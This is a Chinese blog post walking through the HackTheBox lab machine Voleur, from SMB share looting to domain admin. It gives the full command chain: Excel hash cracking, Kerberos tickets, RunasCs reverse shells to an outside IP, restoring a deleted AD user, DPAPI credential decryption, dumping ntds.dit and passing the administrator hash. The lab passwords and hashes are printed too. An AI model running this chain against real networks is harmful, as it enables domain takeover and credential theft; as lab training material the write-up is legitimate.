HTB 第八赛季Voleur靶机:从SMB到域控 (速通版)

admin 2025年7月9日01:25:09评论13 views字数 2400阅读8分0秒阅读模式



 

HTB 第八赛季Voleur靶机:从SMB到域控 (速通版)

hackthebox 第八赛季的新靶机 Voleur,需要熟悉SMB敏感文件泄露,Excel密码破解,kerberos票据,恢复删除用户,DPAPI提权,ntds解密,最终拿到域控权限。

这篇文章只写主要攻击流程,有经验的师傅们可以跟着速通,如果希望有详细writeup请在评论区浏览哦

靶机地址

https://app.hackthebox.com/machines/670

适合读者

√ 红队渗透测试人员
√ 企业安全运维人员
√ CTF竞赛战队
√ 想掌握链式攻击思维的安全从业者

HTB 第八赛季Voleur靶机:从SMB到域控 (速通版)

User flag

smb 探测

nxc smb dc.voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' -k -M spider_plus -o DOWNLOAD_FLAG=True

Excel破解
破解出来是个密码本

office2john Access_Review.xlsx > xlsx.hash
john --wordlist=/usr/share/wordlists/rockyou.txt xlsx.hash
svc_winrm 用户

kerberos客户端配置
vi /etc/krb5.conf

[libdefaults]
    default_realm = VOLEUR.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = false
    ticket_lifetime = 24h
    forwardable = true
    rdns = false

[realms]
    VOLEUR.HTB = {
        kdc = DC.voleur.htb
        admin_server = DC.voleur.htb
    }

[domain_realm]
    .voleur.htb = VOLEUR.HTB
    voleur.htb = VOLEUR.HTB

登录得到第一个 flag

impacket-getTGT 'voleur.HTB/svc_winrm:AFireInsidedeOzarctica980219afi'
export KRB5CCNAME=svc_winrm.ccache
evil-winrm -i dc.voleur.htb -r voleur.htb
HTB 第八赛季Voleur靶机:从SMB到域控 (速通版)

Root flag

Todd.Wolfe 用户

反弹 svc_ldap shell

.RunasCs.exe svc_ldap M1X.....T5Vn cmd.exe -r 10.10.14.10:4446

查找并恢复删除的用户

powershell
Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects
Restore-ADObject -Identity '1c6b1deb-c372-4cbb-87b1-....69db'

继续反弹shell 得到 Todd.Wolfe 权限

.RunasCs.exe Todd.Wolfe Nig.....on14 cmd.exe -r 10.10.14.10:4447
jeremy.combs 用户

找到 DPAPI

 

C:ITSecond-Line SupportArchived Userstodd.wolfeAppDataRoamingMicrosoftProtectS-1-5-21-3927696377-1337352550-2781715495-11108949382-134f-4c63-b93c-ce52efc0aa88
C:ITSecond-Line SupportArchived Userstodd.wolfeAppDataRoamingMicrosoftCredentials772275FAD58525253490A9B0039791D3

 

解密,得到 jeremy.combs 用户密码

impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -password 'NightT1meP1dg3on14' -sid S-1-5-21-3927696377-1337352550-2781715495-1110
impacket-dpapi credential -f 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
域管

反弹shell 拿到 jeremy.combs 交互权限

.RunasCs.exe jeremy.combs qT3V9...W4m cmd.exe -r 10.10.14.10:4448
找到WSL私钥和备份文件
HTB 第八赛季Voleur靶机:从SMB到域控 (速通版)

拖回本地发现是域控的ntds和system等文件

scp -i id_rsa -P 2222 -r "[email protected]:/mnt/c/IT/Third-Line Support/Backups" ./
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
HTB 第八赛季Voleur靶机:从SMB到域控 (速通版)

票据登录 administrator

impacket-getTGT -hashes aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2 'voleur.HTB/administrator'
export KRB5CCNAME=administrator.ccache
evil-winrm -i dc.voleur.htb -r voleur.htb
HTB 第八赛季Voleur靶机:从SMB到域控 (速通版)

 

欢迎关注 红队安全圈
如果文章对你有帮助,欢迎给个一键四连
HTB 第八赛季Voleur靶机:从SMB到域控 (速通版)

原文始发于微信公众号(红队安全圈):HTB 第八赛季Voleur靶机:从SMB到域控 (速通版)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年7月9日01:25:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB 第八赛季Voleur靶机:从SMB到域控 (速通版)https://cn-sec.com/archives/4235608.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息